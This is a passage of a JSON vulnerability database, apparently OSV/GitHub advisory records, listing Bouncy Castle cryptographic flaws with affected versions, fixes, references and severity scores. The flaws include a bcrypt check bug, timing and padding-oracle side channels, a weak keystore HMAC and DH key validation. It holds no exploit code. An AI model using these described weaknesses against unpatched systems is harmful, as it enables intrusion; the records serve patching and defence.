"GHSA-73xv-w5gp-frxh", "published": "2021-04-30T16:14:15Z", "modified": "2024-03-08T05:18:41.838529Z", "aliases": [ "CVE-2020-28052" ], "summary": "Logic error in Legion of the Bouncy Castle BC Java", "details": "An issue was discovered in Legion of the Bouncy Castle BC Java 1.65 and 1.66. 
The OpenBSDBCrypt.checkPassword utility method compared incorrect data when checking the password, allowing incorrect passwords to indicate they were matching with previously hashed ones that were different.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk15to18", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15to18" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.65" }, { "fixed": "1.67" } ] } ], "versions": [ "1.65", "1.66" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-73xv-w5gp-frxh/GHSA-73xv-w5gp-frxh.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.65" }, { "fixed": "1.67" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-73xv-w5gp-frxh/GHSA-73xv-w5gp-frxh.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.65" }, { "fixed": "1.67" } ] } ], "versions": [ "1.65", "1.65.01", "1.66" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-73xv-w5gp-frxh/GHSA-73xv-w5gp-frxh.json" } }, { "package": { "name": "org.bouncycastle:bcprov-ext-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-ext-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.65" }, { "fixed": "1.67" } ] } ], "versions": [ "1.65", "1.66" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-73xv-w5gp-frxh/GHSA-73xv-w5gp-frxh.json" } }, { "package": { "name": 
"org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.65" }, { "fixed": "1.67" } ] } ], "versions": [ "1.65" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-73xv-w5gp-frxh/GHSA-73xv-w5gp-frxh.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk16", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk16" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.65" }, { "fixed": "1.67" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-73xv-w5gp-frxh/GHSA-73xv-w5gp-frxh.json" } }, { "package": { "name": "org.bouncycastle:bcprov-ext-jdk16", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-ext-jdk16" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.65" }, { "fixed": "1.67" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-73xv-w5gp-frxh/GHSA-73xv-w5gp-frxh.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28052" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/97578f9b7ed277e6ecb58834e85e3d18385a4219" }, { "type": "WEB", "url": "https://www.synopsys.com/blogs/software-security/cve-2020-28052-bouncy-castle" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": 
"https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.bouncycastle.org/releasenotes.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfc0db1f3c375087e69a239f9284ded72d04fbb55849eadde58fa9dc2@%3Cissues.karaf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf9abfc0223747a56694825c050cc6b66627a293a32ea926b3de22402@%3Cissues.karaf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdfd2901b8b697a3f6e2c9c6ecc688fd90d7f881937affb5144d61d6e@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rddd2237b8636a48d573869006ee809262525efb2b6ffa6eff50d2a2d@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdcbad6d8ce72c79827ed8c635f9a62dd919bb21c94a0b64cab2efc31@%3Cissues.karaf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcd37d9214b08067a2e8f2b5b4fd123a1f8cb6008698d11ef44028c21@%3Cissues.karaf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc9e441c1576bdc4375d32526d5cf457226928e9c87b9f54ded26271c@%3Cissues.karaf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r954d80fd18e9dafef6e813963eb7e08c228151c2b6268ecd63b35d1f@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8c36ba34e80e05eecb1f80071cc834d705616f315b634ec0c7d8f42e@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r77af3ac7c3bfbd5454546e13faf7aec21d627bdcf36c9ca240436b94@%3Cissues.karaf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4e1619cfefcd031fac62064a3858f5c9229eef907bd5d8ef14c594fc@%3Cissues.karaf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r37d332c0bf772f4982d1fdeeb2f88dd71dab6451213e69e43734eadc@%3Ccommits.pulsar.apache.org%3E" }, { "type": 
"WEB", "url": "https://lists.apache.org/thread.html/r30a139c165b3da6e0d5536434ab1550534011b1fdfcd2f5d95892c5b@%3Cissues.karaf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2ddabd06d94b60cfb0141e4abb23201c628ab925e30742f61a04d013@%3Cissues.karaf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r25d53acd06f29244b8a103781b0339c5e7efee9099a4d52f0c230e4a@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r175f5a25d100dbe2b1bd3459b3ce882a84c3ff91b120ed4ff2d57b53@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r167dbc42ef7c59802c2ca1ac14735ef9cf687c25208229993d6206fe@%3Cissues.karaf.apache.org%3E" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/wiki/CVE-2020-28052" }, { "type": "PACKAGE", "url": "https://github.com/bcgit/bc-java" } ], "database_specific": { "cwe_ids": [ "CWE-670" ], "github_reviewed": true, "github_reviewed_at": "2021-03-19T00:15:55Z", "nvd_published_at": "2020-12-18T01:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-8353-fgcr-xfhx", "published": "2022-05-14T02:14:04Z", "modified": "2024-12-05T05:42:02.521197Z", "aliases": [ "CVE-2013-1624" ], "summary": "Improper Input Validation in Bouncy Castle", "details": "The TLS implementation in the Bouncy Castle Java library before 1.48 and C# library before 1.8 does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": 
"pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.48" } ] } ], "versions": [ "1.46", "1.47" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-8353-fgcr-xfhx/GHSA-8353-fgcr-xfhx.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-1624" }, { "type": "WEB", "url": "http://openwall.com/lists/oss-security/2013/02/05/24" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-0371.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-0372.html" }, { "type": "WEB", "url": "http://secunia.com/advisories/57716" }, { "type": "WEB", "url": "http://secunia.com/advisories/57719" }, { "type": "WEB", "url": "http://www.isg.rhul.ac.uk/tls/TLStiming.pdf" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-07-08T18:59:52Z", "nvd_published_at": "2013-02-08T19:55:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-8477-3v39-ggpm", "published": "2022-05-13T01:01:01Z", "modified": "2023-11-08T04:00:20.719699Z", "aliases": [ "CVE-2018-5382" ], "summary": "Improper Validation of Integrity Check Value in Bouncy Castle", "details": "The default BKS keystore use an HMAC that is only 16 bits long, which can allow an attacker to compromise the integrity of a BKS keystore. Bouncy Castle release 1.47 changes the BKS format to a format which uses a 160 bit HMAC instead. This applies to any BKS keystore generated prior to BC 1.47. For situations where people need to create the files for legacy reasons a specific keystore type \"BKS-V1\" was introduced in 1.49. 
It should be noted that the use of \"BKS-V1\" is discouraged by the library authors and should only be used where it is otherwise safe to do so, as in where the use of a 16 bit checksum for the file integrity check is not going to cause a security issue in itself.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.50" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-8477-3v39-ggpm/GHSA-8477-3v39-ggpm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-5382" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2927" }, { "type": "WEB", "url": "https://www.bouncycastle.org/releasenotes.html" }, { "type": "WEB", "url": "https://www.kb.cert.org/vuls/id/306792" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/103453" } ], "database_specific": { "cwe_ids": [ "CWE-354" ], "github_reviewed": true, "github_reviewed_at": "2022-06-28T23:51:50Z", "nvd_published_at": "2018-04-16T14:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-8xfc-gm6g-vgpv", "published": "2024-05-14T15:32:54Z", "modified": "2024-12-06T15:48:32.838321Z", "aliases": [ "CGA-h49m-7vwx-446f", "CGA-pmw5-3929-3rqr", "CGA-x9cj-c42r-f4mr", "CVE-2024-29857" ], "related": [ "CGA-29h3-969m-j2cr", "CGA-448v-pf2r-j83m", "CGA-4cgj-59hq-h2hc", "CGA-4ph3-8p4p-wr86", "CGA-5hp5-r4pg-f3p7", "CGA-7p4p-m9qg-mv7r", "CGA-89h2-vv89-63r8", "CGA-cw5g-gfw6-xx43", "CGA-f25f-36f8-w45w", "CGA-f92w-p726-49xr", "CGA-g9h5-gx89-c9v8", 
"CGA-p93x-49fc-v5m3", "CGA-pfv3-x3hq-59qp", "CGA-vmgg-m99c-vcmm", "CGA-xx3m-cg2g-f46r" ], "summary": "Bouncy Castle certificate parsing issues cause high CPU usage during parameter evaluation.", "details": "An issue was discovered in ECCurve.java and ECCurve.cs in Bouncy Castle Java (BC Java) before 1.78, BC Java LTS before 2.73.6, BC-FJA before 1.0.2.5, and BC C# .Net before 2.3.1. Importing an EC certificate with crafted F2m parameters can lead to excessive CPU consumption during the evaluation of the curve parameters.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk18on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk18on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.78" } ] } ], "versions": [ "1.71", "1.71.1", "1.72", "1.73", "1.74", "1.75", "1.76", "1.77" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-8xfc-gm6g-vgpv/GHSA-8xfc-gm6g-vgpv.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.78" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59", "1.60", "1.61", "1.62", "1.63", "1.64", "1.65", "1.65.01", "1.66", "1.67", "1.68", "1.69", "1.70" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-8xfc-gm6g-vgpv/GHSA-8xfc-gm6g-vgpv.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15to18", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15to18" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.78" } ] } ], "versions": [ "1.63", "1.64", "1.65", "1.66", "1.67", "1.68", "1.69", "1.70", "1.71", "1.72", 
"1.73", "1.74", "1.75", "1.76", "1.77" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-8xfc-gm6g-vgpv/GHSA-8xfc-gm6g-vgpv.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.78" } ] } ], "versions": [ "1.38", "1.43", "1.44", "1.45", "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59", "1.60", "1.61", "1.62", "1.63", "1.64", "1.65", "1.67", "1.68", "1.69", "1.70", "1.71", "1.72", "1.73", "1.74", "1.75", "1.76", "1.77" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-8xfc-gm6g-vgpv/GHSA-8xfc-gm6g-vgpv.json" } }, { "package": { "name": "org.bouncycastle:bctls-jdk18on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bctls-jdk18on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.78" } ] } ], "versions": [ "1.71", "1.71.1", "1.72", "1.73", "1.74", "1.75", "1.76", "1.77" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-8xfc-gm6g-vgpv/GHSA-8xfc-gm6g-vgpv.json" } }, { "package": { "name": "org.bouncycastle:bctls-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bctls-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.78" } ] } ], "versions": [ "1.61", "1.62", "1.63", "1.64", "1.65", "1.67", "1.68", "1.69", "1.70", "1.71", "1.72", "1.73", "1.74", "1.75", "1.76", "1.77" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-8xfc-gm6g-vgpv/GHSA-8xfc-gm6g-vgpv.json" } }, { "package": { "name": "org.bouncycastle:bctls-jdk15to18", 
"ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bctls-jdk15to18" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.78" } ] } ], "versions": [ "1.63", "1.64", "1.65", "1.66", "1.67", "1.68", "1.69", "1.70", "1.71", "1.72", "1.73", "1.74", "1.75", "1.76", "1.77" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-8xfc-gm6g-vgpv/GHSA-8xfc-gm6g-vgpv.json" } }, { "package": { "name": "org.bouncycastle:bc-fips", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bc-fips" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.0.2.5" } ] } ], "versions": [ "1.0.0", "1.0.1", "1.0.2", "1.0.2.1", "1.0.2.3", "1.0.2.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-8xfc-gm6g-vgpv/GHSA-8xfc-gm6g-vgpv.json" } }, { "package": { "name": "BouncyCastle", "ecosystem": "NuGet", "purl": "pkg:nuget/BouncyCastle" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "1.7.0", "1.8.1", "1.8.2", "1.8.3", "1.8.3.1", "1.8.4", "1.8.5", "1.8.6", "1.8.6.1", "1.8.9" ], "database_specific": { "last_known_affected_version_range": "\u003c 2.3.1", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-8xfc-gm6g-vgpv/GHSA-8xfc-gm6g-vgpv.json" } }, { "package": { "name": "BouncyCastle.Cryptography", "ecosystem": "NuGet", "purl": "pkg:nuget/BouncyCastle.Cryptography" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.3.1" } ] } ], "versions": [ "2.0.0", "2.1.0", "2.1.1", "2.2.0", "2.2.1", "2.3.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-8xfc-gm6g-vgpv/GHSA-8xfc-gm6g-vgpv.json" } } ], "references": [ { "type": "ADVISORY", "url": 
"https://nvd.nist.gov/vuln/detail/CVE-2024-29857" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-csharp/commit/56daa6eac526f165416d17f661422d60de0dfd63" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/efc498ca4caa340ac2fe11f2efee06c1a294501f" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/fee80dd230e7fba132d03a34f1dd1d6aae0d0281" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-csharp/wiki/CVE%E2%80%902024%E2%80%9029857" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/wiki/CVE%E2%80%902024%E2%80%9029857" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20241206-0008" }, { "type": "WEB", "url": "https://www.bouncycastle.org/latest_releases.html" } ], "database_specific": { "cwe_ids": [ "CWE-125", "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2024-05-14T20:22:01Z", "nvd_published_at": "2024-05-14T15:17:02Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9gp4-qrff-c648", "published": "2018-10-18T18:04:13Z", "modified": "2025-09-12T20:11:27.017633Z", "aliases": [ "CVE-2016-1000345" ], "summary": "Moderate severity vulnerability that affects org.bouncycastle:bcprov-jdk14 and org.bouncycastle:bcprov-jdk15", "details": "In the Bouncy Castle JCE Provider version 1.55 and earlier the DHIES/ECIES CBC mode is vulnerable to a padding oracle attack.
For BC 1.55 and older, in an environment where timings can be easily observed, it is possible with enough observations to identify when the decryption is failing due to padding.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.38", "1.43", "1.44", "1.45", "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-9gp4-qrff-c648/GHSA-9gp4-qrff-c648.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.32", "1.38", "1.40", "1.43", "1.44", "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-9gp4-qrff-c648/GHSA-9gp4-qrff-c648.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-9gp4-qrff-c648/GHSA-9gp4-qrff-c648.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-1000345" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/21dcb3d9744c83dcf2ff8fcee06dbca7bfa4ef35#diff-4439ce586bf9a13bfec05c0d113b8098" }, { "type": "WEB", "url": 
"https://access.redhat.com/errata/RHSA-2018:2669" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2927" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-9gp4-qrff-c648" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00009.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20181127-0004" }, { "type": "WEB", "url": "https://usn.ubuntu.com/3727-1" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:28:32Z", "nvd_published_at": "2018-06-04T21:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-c8xf-m4ff-jcxj", "published": "2018-10-17T16:23:38Z", "modified": "2025-09-12T20:11:29.725840Z", "aliases": [ "CVE-2016-1000339" ], "summary": "Moderate severity vulnerability that affects org.bouncycastle:bcprov-jdk14 and org.bouncycastle:bcprov-jdk15", "details": "In the Bouncy Castle JCE Provider version 1.55 and earlier the primary engine class used for AES was AESFastEngine. Due to the highly table driven approach used in the algorithm it turns out that if the data channel on the CPU can be monitored the lookup table accesses are sufficient to leak information on the AES key being used. There was also a leak in AESEngine although it was substantially less. AESEngine has been modified to remove any signs of leakage (testing carried out on Intel X86-64) and is now the primary AES class for the BC JCE provider from 1.56. 
Use of AESFastEngine is now only recommended where otherwise deemed appropriate.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.38", "1.43", "1.44", "1.45", "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-c8xf-m4ff-jcxj/GHSA-c8xf-m4ff-jcxj.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.32", "1.38", "1.40", "1.43", "1.44", "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-c8xf-m4ff-jcxj/GHSA-c8xf-m4ff-jcxj.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-c8xf-m4ff-jcxj/GHSA-c8xf-m4ff-jcxj.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-1000339" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/413b42f4d770456508585c830cfcde95f9b0e93b#diff-54656f860db94b867ba7542430cd2ef0" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/8a73f08931450c17c749af067b6a8185abdfd2c0#diff-494fb066bed02aeb76b6c005632943f2" }, { 
"type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2669" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2927" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-c8xf-m4ff-jcxj" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00009.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20181127-0004" }, { "type": "WEB", "url": "https://usn.ubuntu.com/3727-1" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:30:37Z", "nvd_published_at": "2018-06-04T13:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-fjqm-246c-mwqg", "published": "2018-10-17T16:27:28Z", "modified": "2025-09-12T20:11:33.148189Z", "aliases": [ "CVE-2016-1000346" ], "summary": "In Bouncy Castle JCE Provider the other party DH public key is not fully validated", "details": "In the Bouncy Castle JCE Provider version 1.55 and earlier the other party DH public key is not fully validated. This can cause issues as invalid keys can be used to reveal details about the other party's private key where static Diffie-Hellman is in use. 
As of release 1.56 the key parameters are checked on agreement calculation.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.38", "1.43", "1.44", "1.45", "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-fjqm-246c-mwqg/GHSA-fjqm-246c-mwqg.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.32", "1.38", "1.40", "1.43", "1.44", "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-fjqm-246c-mwqg/GHSA-fjqm-246c-mwqg.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-fjqm-246c-mwqg/GHSA-fjqm-246c-mwqg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-1000346" }, { "type": "WEB", "url": 